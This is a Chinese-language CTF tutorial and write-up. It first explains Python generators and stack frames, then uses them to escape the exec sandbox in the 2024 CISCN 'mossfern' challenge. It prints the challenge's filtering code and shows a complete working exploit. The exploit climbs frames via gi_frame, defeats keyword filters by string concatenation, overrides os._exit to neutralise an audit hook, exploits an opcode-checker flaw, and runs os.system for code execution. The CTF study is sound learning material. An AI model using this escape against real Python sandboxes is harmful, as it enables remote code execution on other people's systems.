基础知识 什么是生成器 生成器(Generator)是Python中一种特殊的迭代器,它通过函数和表达式来创建,可以逐个产生值,并在每次生成一个值后暂停执行,保留当前状态,以便下一次调用时能够从暂停的地方继续执行
生成器函数使用yield语句生成值,而不是普通函数的return,调用生成器函数返回的是一个生成器对象,每次调用该对象的next()方法时,生成器函数会从上次暂停的位置继续执行,直到遇到下一个yield或函数结束
举个简单的例子
1 2 3 4 5 6 7 8 9 def generator (): yield 1 yield 2 yield 3 g = generator() print (next (g)) print (next (g)) print (next (g))
生成器表达式 为了更方便的书写,我们可以用生成器表达式,这是Python中创建生成器对象的一种简洁语法,形式类似列表推导式,但用的是圆括号()
1 2 g = (i for i in range (3 )) print (g)
通过next()方法来逐步执行
1 2 3 4 g = (i for i in range (3 )) print (next (g)) print (next (g)) ...
如果一直逐步执行的话太麻烦了,我们可以用循环来执行,有很多方法,这里列举几个常用的
for循环遍历生成器
1 2 3 4 5 6 7 g = (i for i in range (3 )) for i in g: print (i)
列表推导式 循环创建列表
1 2 g = (i for i in range (3 )) print ([ i for i in g ])
解包操作 构造列表
1 2 g = (i for i in range (3 )) print ([*g])
生成器属性 生成器的常用属性主要包括:
gi_code:生成器对应的代码对象,包含生成器函数的字节码和相关信息
gi_frame:生成器当前运行的帧对象(当前执行的位置、局部变量等)
gi_running:表示生成器是否正在执行,True表示运行中,False表示空闲,例如next(g)执行的时候是True,执行前、执行后都是False
gi_yieldfrom:当前生成器遇到的 yield from 语句引用的子生成器对象
gi_frame.f_locals:可以访问生成器当前帧的局部变量字典
其中用的比较多的是gi_frame,它指向该生成器当前执行的栈帧对象,用于保存该生成器函数在执行过程中的上下文信息。可以理解为函数执行的“快照”,包括当前执行到了哪条指令、局部变量、全局变量等
举个例子
1 2 3 4 5 6 7 8 def gen (): yield 1 yield 2 g = gen() print (g.gi_code) print (g.gi_frame) print (g.gi_running)
栈帧 Python中,栈帧是运行时管理函数调用和执行状态的关键数据结构。它包含了函数执行时的所有重要信息,如当前执行位置、局部变量、参数、返回地址等,任何函数调用都会创建一个栈帧,函数退出时栈帧销毁
栈帧包含以下重要属性
f_locals:局部变量字典,可以查看和修改生成器当前帧的局部变量
f_globals:全局变量字典,存储当前模块的全局变量
f_code:代码对象,包含字节码指令等函数定义信息
f_lasti:当前执行的指令索引,指示执行到了哪条字节码指令
f_back:指向上一级调用栈帧,可用于追踪调用链
获取栈帧的方式同样也很多
sys._getframe()
sys._getframe()函数用于获取当前或指定深度的栈帧,语法是sys._getframe([depth]),depth是可选参数,表示从当前调用帧起向上追溯的层数,0表示当前帧,1表示上一个调用帧,以此类推
举个例子
1 2 3 4 5 6 7 8 9 10 11 import sysdef foo (depth=0 ): frame = sys._getframe() for _ in range (depth): frame = frame.f_back return frame print (foo(0 )) print (foo(1 )) print (foo(2 ))
inspect模块的currentframe()
inspect.currentframe()返回当前调用的栈帧
1 2 3 4 5 6 7 8 import inspectdef foo (): frame = inspect.currentframe() print (frame) foo()
通过生成器的gi_frame属性
生成器对象保存当前执行的栈帧,可直接访问gi_frame,查看执行状态和局部变量
1 2 3 4 5 6 7 def foo (): x = 1 yield x f = foo() print (f.gi_frame)
我们需要重点掌握的就是栈帧回溯,后续我们的栈帧沙箱逃逸就是基于此进行
举个例子
1 2 3 4 5 6 7 8 9 10 11 import sysf1 = sys._getframe() def func (): f2 = sys._getframe() print (f2.f_back is f1) print (f2) print (f2.f_back) func() print (f1)
可以看到,f2.f_back对应的帧地址和f1相同,均为0x000001F13D745DD0
利用栈帧进行沙箱逃逸 一般情况下这种题目的逻辑是
1 2 3 4 5 6 7 8 9 10 flag = "this is flag" code = """接受用户输入代码""" compiled_code = compile (code) exec ( compiled_code, None , None )
通过对用户输入的数据进行过滤,导致很多方法无法使用,这时候可以利用栈帧进行沙箱逃逸,代码如下
1 2 q = (q.gi_frame.f_back.f_back.f_globals for _ in [1 ]) g = [*q][0 ]
生成器在创建时会生成栈帧,第一个f_back跳出生成器,第二个f_back跳出exec包围圈,最后调用f_globals获取全局globals
前面我们讲到获取栈帧的方法还有sys._getframe()函数和inspect模块的currentframe(),但这两个由于需要import外部模块,import本身以及sys、inspect可能都被禁用了,所以就用gi_frame来获取栈帧
运行生成器的话你可以不用解包操作,用列表推导式或循环遍历都可以,具体情况视题目而定。至于为什么next()不可以呢,因为next属于builtins模块,builtins一般都被禁用了
题目解析 2024CISCN mossfern 这道题是关于Python栈帧沙箱逃逸,我们用ctfshow的环境来复现
首先下载源码进行分析,可以看到存在路由/run且通过Json来传输数据
然后传入的数据被送到runner.py进行过滤,随后进行exec执行代码,代码如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 def source_simple_check (source ): """ Check the source with pure string in string, prevent dangerous strings :param source: source code :return: None """ from sys import exit from builtins import print try : source.encode("ascii" ) except UnicodeEncodeError: print ("non-ascii is not permitted" ) exit() for i in ["__" , "getattr" , "exit" ]: if i in source.lower(): print (i) exit() def block_wrapper (): """ Check the run process with sys.audithook, no dangerous operations should be conduct :return: None """ def audit (event, args ): from builtins import str , print import os for i in ["marshal" , "__new__" , "process" , "os" , "sys" , "interpreter" , "cpython" , "open" , "compile" , "gc" ]: if i in (event + "" .join(str (s) for s in args)).lower(): print (i) os._exit(1 ) return audit def source_opcode_checker (code ): """ Check the source in the bytecode aspect, no methods and globals should be load :param code: source code :return: None """ from dis import dis from builtins import str from io import StringIO from sys import exit opcodeIO = StringIO() dis(code, file=opcodeIO) opcode = opcodeIO.getvalue().split("\n" ) opcodeIO.close() for line in opcode: if any (x in str (line) for x in ["LOAD_GLOBAL" , "IMPORT_NAME" , "LOAD_METHOD" ]): if any (x in str (line) for x in ["randint" , "randrange" , "print" , "seed" ]): break print ("" .join([x for x in ["LOAD_GLOBAL" , "IMPORT_NAME" , "LOAD_METHOD" ] if x in str (line)])) exit() if __name__ == "__main__" : from builtins import open from sys import addaudithook from contextlib import redirect_stdout from random import randint, randrange, seed from io import StringIO from random import seed from time import time source = open (f"/app/uploads/THIS_IS_TASK_RANDOM_ID.txt" , "r" ).read() source_simple_check(source) source_opcode_checker(source) code = compile (source, "<sandbox>" , "exec" ) addaudithook(block_wrapper()) outputIO = StringIO() with redirect_stdout(outputIO): seed(str (time()) + "THIS_IS_SEED" + str (time())) exec (code, { "__builtins__" : None , "randint" : randint, "randrange" : randrange, "seed" : seed, "print" : print }, None ) output = outputIO.getvalue() if "THIS_IS_SEED" in output: print ("这 runtime 你就嘎嘎写吧, 一写一个不吱声啊,点儿都没拦住!" ) print ("bad code-operation why still happened ah?" ) else : print (output)
runner.py构建了一个多层沙箱来执行用户代码,简单解释一下:
静态字符串检测 (source_simple_check): 检查源码是否包含__、getattr、exit等字符串(不区分大小写)
字节码检测 (source_opcode_checker): 检查代码编译后的字节码,禁止了LOAD_GLOBAL、IMPORT_NAME、LOAD_METHOD等操作码,但白名单允许randint、randrange、print、seed这几个函数的使用
运行时审计 (block_wrapper): 使用sys.addaudithook在运行时监控并禁止了open, os, sys等一系列敏感事件
执行环境限制 : 通过exec(code, {"__builtins__": None, ...})执行代码,__builtins__被设为None,并且全局作用域中只提供了randint, randrange, seed, print 四个函数
限制得很死,很多方法都没法用,这时我们就可以考虑用栈帧回溯来做,核心思路如下
1 2 q = (q.gi_frame.f_back.f_back.f_globals for _ in [1 ]) globals = [*q][0 ]
获取到全局变量之后就可以尝试获取builtins模块,双下划线被过滤我们可以用字符串拼接完成
1 builtins = globals ['_' +'_builtins_' +'_' ]
接下来就是想办法绕过block_wrapper检查,因为audithook是运行时审计,所以想通过变量赋值方式绕过是不行的
如果检测到名单中的字符串就会打印并退出,因为print是在builtins模块里的,因此我们可以重写print方法,修改os._exit为其他函数即可成功跳出该沙箱
代码跟上面获取builtins的方式差不多,因为os在本地符号表,所以这里我们用locals,然后用setattr来重写os._exit
这里往上跳两层到本地就可以,不需要跳到全局,具体如下
1 2 3 4 5 6 def rewrite_print (a ): q = (q.gi_frame.f_back.f_back.f_locals for _ in [1 ]) locals = [*q][0 ] if 'os' in locals : builtins.setattr (locals ['os' ], '_ex' +'it' , print ) builtins.print = rewrite_print
接下来从builtins提取eval,获取import再导入os调用system即可实现RCE
1 2 3 4 eval = builtins.eval imp = eval ('builtins._' +'_import_' +'_' ) system = imp("os" ).system system("ls /" )
将上面的拼接起来,可以得到一个骨架
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 q = (q.gi_frame.f_back.f_back.f_globals for _ in [1 ]) globals = [*q][0 ]builtins = globals ['_' +'_builtins_' +'_' ] def rewrite_print (a ): q = (q.gi_frame.f_back.f_back.f_locals for _ in [1 ]) locals = [*q][0 ] if 'os' in locals : builtins.setattr (locals ['os' ], '_ex' +'it' , print ) builtins.print = rewrite_print eval = builtins.eval imp = eval ('builtins._' +'_import_' +'_' ) system = imp("os" ).system system("ls /" )
最后我们想办法绕过source_opcode_checker,仔细分析可以发现该函数存在一个逻辑漏洞
1 2 3 4 5 6 for line in opcode: if any (x in str (line) for x in ["LOAD_GLOBAL" , "IMPORT_NAME" , "LOAD_METHOD" ]): if any (x in str (line) for x in ["randint" , "randrange" , "print" , "seed" ]): break print ("" .join([x for x in ["LOAD_GLOBAL" , "IMPORT_NAME" , "LOAD_METHOD" ] if x in str (line)])) exit()
这里的break会直接跳出整个for循环,而不是continue继续检查下一行字节码,我们只要想办法触发break,那么后续所有代码的字节码都不会被检查
一开始我想通过在开头加个print(1)来触发break,但是试了一下发现返回LOAD_GLOBAL,也就是检测到了LOAD_GLOBAL但是没检测到print(1),导致exit
开个本地调试观察分析,下个断点
发现有个LOAD_GLOBAL q,q指的是我们前面写的生成器,又因为在生成器内部尝试引用q,所以触发了LOAD_GLOBAL,但是q不是白名单里的,所以就exit了
那print呢,我们打开opcode,可以发现print不是LOAD_GLOBAL,而是LOAD_NAME
后面问AI说是版本问题,Python 3.11+是LOAD_NAME,那只能换个办法
前面我们知道生成器反汇编之后有个LOAD_GLOBAL,那我们尝试在生成器里面引用print试试,开头改为(print for _ in [1]),重新下断点调试
这次就没问题了,成功绕过source_opcode_checker限制
组合起来,完整的exp就是
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 (print for _ in [1 ]) q = (q.gi_frame.f_back.f_back.f_globals for _ in [1 ]) globals = [*q][0 ]builtins = globals ['_' +'_builtins_' +'_' ] def rewrite_print (a ): q = (q.gi_frame.f_back.f_back.f_locals for _ in [1 ]) locals = [*q][0 ] if 'os' in locals : builtins.setattr (locals ['os' ], '_ex' +'it' , print ) builtins.print = rewrite_print eval = builtins.eval imp = eval ('builtins._' +'_import_' +'_' ) system = imp("os" ).system system("ls /" )
我们写个python脚本来转换成Json数据
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 import jsoncode = """ (print for _ in [1]) q = (q.gi_frame.f_back.f_back.f_globals for _ in [1]) globals = [*q][0] builtins = globals['_'+'_builtins_'+'_'] def rewrite_print(a): q = (q.gi_frame.f_back.f_back.f_locals for _ in [1]) locals = [*q][0] if 'os' in locals: builtins.setattr(locals['os'], '_ex'+'it', print) builtins.print = rewrite_print eval = builtins.eval imp = eval('builtins._'+'_import_'+'_') system = imp("os").system system("ls /") """ json_code = json.dumps({"code" : code}) print (json_code)
得到结果
1 { "code" : "\n(print for _ in [1])\nq = (q.gi_frame.f_back.f_back.f_globals for _ in [1])\nglobals = [*q][0]\nbuiltins = globals['_'+'_builtins_'+'_']\n\ndef rewrite_print(a):\n q = (q.gi_frame.f_back.f_back.f_locals for _ in [1])\n locals = [*q][0]\n if 'os' in locals:\n builtins.setattr(locals['os'], '_ex'+'it', print)\nbuiltins.print = rewrite_print\n\neval = builtins.eval\nimp = eval('builtins._'+'_import_'+'_')\nsystem = imp(\"os\").system\nsystem(\"ls /\")\n" }
放入网站执行,类型要改为application/json
成功拿到flag